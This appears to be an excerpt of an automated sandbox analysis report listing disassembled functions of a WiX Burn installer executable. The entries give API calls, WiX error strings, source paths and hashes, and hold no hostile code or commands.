                                                                                                                                                                  • Opcode Fuzzy Hash: a74e6c48d42b6f80242686008f4683c585a69826d0eeb45fb997eef60b648bd4
                                                                                                                                                                  • Instruction Fuzzy Hash: 5641D731F40319BBEB20ABA48C47FEE7ABCAF54B95F104114B700B91C2D7B099D09AD5
                                                                                                                                                                  Function 009755DB Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 131registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00974F04: lstrlenW.KERNEL32(00917162,00916DEA,?,?,?,00975488,00917162,00916DEA,00916EC2,00916DEA,00916DEA,?,?,?,00930D28,0D8C6817), ref: 00974F2A
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,0097E7E8,?,8000FFFF,8000FFFF,00020006,00000000,00000000,00000000,00000000,00000000,00000000,8000FFFF,?), ref: 00975735
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to create the dependency registry key "%ls"., xrefs: 00975648
                                                                                                                                                                  • default, xrefs: 00975672
                                                                                                                                                                  • version.dll, xrefs: 009755E1
                                                                                                                                                                  • Failed to set the %ls registry value to %d., xrefs: 00975710
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00975612, 0097571F
                                                                                                                                                                  • Failed to allocate the registry key for dependency "%ls"., xrefs: 00975603
                                                                                                                                                                  • Failed to set the %ls registry value to "%ls"., xrefs: 00975677, 009756AB, 009756DC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Closelstrlen
                                                                                                                                                                  • String ID: Failed to allocate the registry key for dependency "%ls".$Failed to create the dependency registry key "%ls".$Failed to set the %ls registry value to "%ls".$Failed to set the %ls registry value to %d.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp$default$version.dll
                                                                                                                                                                  • API String ID: 3903209405-20855631
                                                                                                                                                                  • Opcode ID: a72305a113a908713eb1336e086dd3f793ea1e5509bc151b617ff76d1090bcf5
                                                                                                                                                                  • Instruction ID: d05eebaa7f5795045ecb49994d4de60f05a660051195f8aebd175f34a478d0f1
                                                                                                                                                                  • Opcode Fuzzy Hash: a72305a113a908713eb1336e086dd3f793ea1e5509bc151b617ff76d1090bcf5
                                                                                                                                                                  • Instruction Fuzzy Hash: 5041C873B41A18FBDB226F948D46F9F7F75EB85B50F024154BA04791A1D2B14E10A790
                                                                                                                                                                  Function 0092FC95 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 126COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to determine length of relative path., xrefs: 0092FCEF
                                                                                                                                                                  • Failed to trim source folder., xrefs: 0092FD48
                                                                                                                                                                  • WixBundleLastUsedSource, xrefs: 0092FD5F, 0092FD65, 0092FDA3
                                                                                                                                                                  • Failed to determine length of source path., xrefs: 0092FCC5
                                                                                                                                                                  • Failed to set last source., xrefs: 0092FDB2
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 0092FDC4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 0-3313679279
                                                                                                                                                                  • Opcode ID: c0585499c14b9bcb9b22d84dd83c563a78a44743b76687a4e0177d0407edf819
                                                                                                                                                                  • Instruction ID: 573e7ee474c6b34a2c3ecd3dbefa04fc421985974ac569cc3d310344ae02f775
                                                                                                                                                                  • Opcode Fuzzy Hash: c0585499c14b9bcb9b22d84dd83c563a78a44743b76687a4e0177d0407edf819
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F41EB32E40239BBDF22AA94DC56FDF7A79DB45B60F110671F510BA1D4D7B09940C790
                                                                                                                                                                  Function 009700B5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 112memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 009700C9
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009700D5
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009701C4
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 009701CF
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 00970107, 00970140
                                                                                                                                                                  • failed get_attributes, xrefs: 009700F8
                                                                                                                                                                  • failed get_nodeValue in XmlGetAttribute(%ls), xrefs: 0097016F
                                                                                                                                                                  • failed getNamedItem in XmlGetAttribute(%ls), xrefs: 00970131
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed getNamedItem in XmlGetAttribute(%ls)$failed get_attributes$failed get_nodeValue in XmlGetAttribute(%ls)
                                                                                                                                                                  • API String ID: 760788290-1291303398
                                                                                                                                                                  • Opcode ID: 0537b9faa3fe449d290587c554ecaa8f1abf3d798eba28a5c6b9605fc47167b8
                                                                                                                                                                  • Instruction ID: 7eb54fffe394239ebd0e0c6cf647a15d590b8b0ac64e56664793afb00f9b6c59
                                                                                                                                                                  • Opcode Fuzzy Hash: 0537b9faa3fe449d290587c554ecaa8f1abf3d798eba28a5c6b9605fc47167b8
                                                                                                                                                                  • Instruction Fuzzy Hash: 6131C076704219EBDB059B54CC4AF6E77B9ABC9B11F058098F909AB2A1DB709E40CB90
                                                                                                                                                                  Function 0091643F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 112COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000105,00000000,00000000,00000105,00000000,00000000,00000000,?,?,?,009147DC,?,00000000,00000000,00000000,0100147D), ref: 0091648B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                  • String ID: Failed to allocate space for current directory.$Failed to get current directory.$Failed to get max length of input buffer.$Failed to reallocate space for current directory.$GetCurrentDirectoryW results never converged.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp
                                                                                                                                                                  • API String ID: 1611563598-979167295
                                                                                                                                                                  • Opcode ID: afc543c1b64c4b0d3d12962997435b416884566dd2af0edc6ec109a7bae871be
                                                                                                                                                                  • Instruction ID: 7fabf67d93359d445dcd139b21dc35dfafe65c1d536ff63e02098f239448be17
                                                                                                                                                                  • Opcode Fuzzy Hash: afc543c1b64c4b0d3d12962997435b416884566dd2af0edc6ec109a7bae871be
                                                                                                                                                                  • Instruction Fuzzy Hash: 7C31F4B2F4172D77E72156588C4AFEF6A6DAB85B90F014425B905BB2D0E1B4DC8096A0
                                                                                                                                                                  Function 0092079A Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 107COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00916CF2,00000000,7D8B5756,00916CF2,00000000,00917162,00917162,00916DEA,00000000,00917162,00000000,00916DEA,00916CF2,00917162,00916DEA,00916EDE), ref: 00920814
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092081F
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to initialize file search., xrefs: 009207C3
                                                                                                                                                                  • Failed to set directory search path variable., xrefs: 00920850
                                                                                                                                                                  • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 009208AC
                                                                                                                                                                  • Failed while searching directory search: %ls, for path: %ls, xrefs: 00920885
                                                                                                                                                                  • Failed to format variable string., xrefs: 009207FD
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 009207D5, 00920897
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                                  • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to initialize file search.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                  • API String ID: 1799206407-3281098314
                                                                                                                                                                  • Opcode ID: 2d480a9fd12966187248923c3c5d5b0e4a84c62b5e824a7a2610092330be7cca
                                                                                                                                                                  • Instruction ID: 782ba913994d843c98dc7cd41abd9c30ac73017af6d6f2c44f231d4fa93ecd1f
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d480a9fd12966187248923c3c5d5b0e4a84c62b5e824a7a2610092330be7cca
                                                                                                                                                                  • Instruction Fuzzy Hash: E2313D32E40639B7DB126A949C47F9F7E28AFC0720F110511F950B62D2E3719D5097D1
                                                                                                                                                                  Function 00977606 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00949860,00000000,?), ref: 0097761D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00949860,00000000,?,?,?,?,?,?,?,?,?,00949D0A,?,?), ref: 0097762B
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,00949860,00000000,?), ref: 00977682
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00949860,00000000,?,?,?,?,?,?,?,?,?,00949D0A,?,?), ref: 0097768C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConfigErrorHeapLastQueryService$AllocateProcess
                                                                                                                                                                  • String ID: Failed to allocate memory to get configuration.$Failed to query service configuration.$Failed to read service configuration.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\svcutil.cpp
                                                                                                                                                                  • API String ID: 355237494-3172380343
                                                                                                                                                                  • Opcode ID: cc248e9e3abae98e7481f7e9cab237ac4447489a318197901ce4df96f181bbff
                                                                                                                                                                  • Instruction ID: b4db587bcfb8f2fe889dfaa3ce003cd64912207221ccfc51aff44a7ee7143990
                                                                                                                                                                  • Opcode Fuzzy Hash: cc248e9e3abae98e7481f7e9cab237ac4447489a318197901ce4df96f181bbff
                                                                                                                                                                  • Instruction Fuzzy Hash: 2B313937B45735B7E73116D58C4AFAFAD5CDB86BA0F124015FE0CBA181E2A48D4092F1
                                                                                                                                                                  Function 00920A29 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 104COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00916CF2,00000000,7D8B5756,00916CF2,00000000,00917162,00917162,00916DEA,00000000,00917162,00000000,00916DEA,00916CF2), ref: 00920AA3
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00920AAE
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to initialize file search., xrefs: 00920A52
                                                                                                                                                                  • Failed while searching file search: %ls, for path: %ls, xrefs: 00920ADC
                                                                                                                                                                  • File search: %ls, did not find path: %ls, xrefs: 00920B33
                                                                                                                                                                  • Failed to set variable to file search path., xrefs: 00920B17
                                                                                                                                                                  • Failed to format variable string., xrefs: 00920A8C
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 00920A64, 00920AEE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                                  • String ID: Failed to format variable string.$Failed to initialize file search.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                  • API String ID: 1799206407-4156759458
                                                                                                                                                                  • Opcode ID: 68d9e6a849849e3297e9cb6789e8c52208350e364ac622a3ac428abd650eba3b
                                                                                                                                                                  • Instruction ID: 1561b9ba644de58754103c009554c5d501851aeb21ec02eedba72023bd8d2dce
                                                                                                                                                                  • Opcode Fuzzy Hash: 68d9e6a849849e3297e9cb6789e8c52208350e364ac622a3ac428abd650eba3b
                                                                                                                                                                  • Instruction Fuzzy Hash: 56319032E40739BBDF226A949C0BF9EBA3CAF84714F114511F9147A1D2D3B19E5097D0
                                                                                                                                                                  Function 00956302 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 0095631B
                                                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00956333
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0095637E
                                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 00956395
                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 0095639E
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to send files in use message from netfx chainer., xrefs: 009563EF
                                                                                                                                                                  • Failed to get message from netfx chainer., xrefs: 009563BF
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp, xrefs: 00956401
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MutexObjectReleaseSingleWait$Event
                                                                                                                                                                  • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp
                                                                                                                                                                  • API String ID: 2608678126-3113603724
                                                                                                                                                                  • Opcode ID: 93260071abf1a994979daedb6a7d0722b908307f5005f0e8fe7ae9ccce3ef852
                                                                                                                                                                  • Instruction ID: 5445d622bcd33701484917294b3b7ca39b32ed6033d8969e5c4582c1629ae261
                                                                                                                                                                  • Opcode Fuzzy Hash: 93260071abf1a994979daedb6a7d0722b908307f5005f0e8fe7ae9ccce3ef852
                                                                                                                                                                  • Instruction Fuzzy Hash: 0B31F471600229BFCB11DF55DC49EEEBFB9EF18721F008265F924A72A2C7709950DBA0
                                                                                                                                                                  Function 00973A62 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 94fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,?,0095262E,00000000,00000000,00000000,?), ref: 00973AAF
                                                                                                                                                                  • GetLastError.KERNEL32(?,0095262E,00000000,00000000,00000000,?,?,?,0094EE7E,458BF88B,?,?,?,00000000,00000000,?), ref: 00973ABC
                                                                                                                                                                  • GetLastError.KERNEL32(?,0095262E,00000000,00000000,00000000,?,?,?,0094EE7E,458BF88B,?,?,?,00000000,00000000,?), ref: 00973ACE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CreateFile
                                                                                                                                                                  • String ID: Attempted to check filename, but no filename was provided$Failed to check size of file %ls by handle$Failed to open file %ls while checking file size$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                  • API String ID: 1722934493-1003940733
                                                                                                                                                                  • Opcode ID: 468097e932f1eb771f309ae007506e48f54eb36814526e2b54a0c20f7d5c681b
                                                                                                                                                                  • Instruction ID: 67c89dd2de929bfb2f27d788d3c53a37b1e5e90a81f1d68eb309ccb30fdb3661
                                                                                                                                                                  • Opcode Fuzzy Hash: 468097e932f1eb771f309ae007506e48f54eb36814526e2b54a0c20f7d5c681b
                                                                                                                                                                  • Instruction Fuzzy Hash: 9321D773B8122577E33221585C8BFBF6A1C9B86F60F11C115FE1DBB1C195A58E4061F1
                                                                                                                                                                  Function 00929839 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 74registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00927CE9: lstrlenA.KERNEL32(?,00000000,?,00000000,?,?,?,?,swidtag,?,?,?,?,00000000), ref: 00927D78
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00916DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00932F8D,00916DA2,00000001,00000001), ref: 0092997D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Closelstrlen
                                                                                                                                                                  • String ID: %04u%02u%02u$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$InstallDate$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 3903209405-1589291871
                                                                                                                                                                  • Opcode ID: 415d6911c764a540ac179c64a00772e1f0b47ab45dea73d1feb4181068474632
                                                                                                                                                                  • Instruction ID: fc0387d481d7816e0e2653c170bf69eb1219ece5823172af9f57d538c268608a
                                                                                                                                                                  • Opcode Fuzzy Hash: 415d6911c764a540ac179c64a00772e1f0b47ab45dea73d1feb4181068474632
                                                                                                                                                                  • Instruction Fuzzy Hash: 08213A31E40335B6DB21ABA0EC0BFFF79689B85B15F140165FA04B93C5D6A48D80C7A1
                                                                                                                                                                  Function 0091A669 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 116stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 0091A67C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                  • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 1659193697-948137518
                                                                                                                                                                  • Opcode ID: 3fb8fb26989b77c86dc1f7f8fef05b1655ad812d0f9baa3a095e13d6450efee7
                                                                                                                                                                  • Instruction ID: 2b218d81bb5a9226d44d4d260aef529a0bb569bd06adcf2f2a6ee09e04aea448
                                                                                                                                                                  • Opcode Fuzzy Hash: 3fb8fb26989b77c86dc1f7f8fef05b1655ad812d0f9baa3a095e13d6450efee7
                                                                                                                                                                  • Instruction Fuzzy Hash: D631D672F8231CB7DB22A7908C8BFEF7AAC9B50B55F200111BA01BA1C0D6A45FD09691
                                                                                                                                                                  Function 0095A271 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
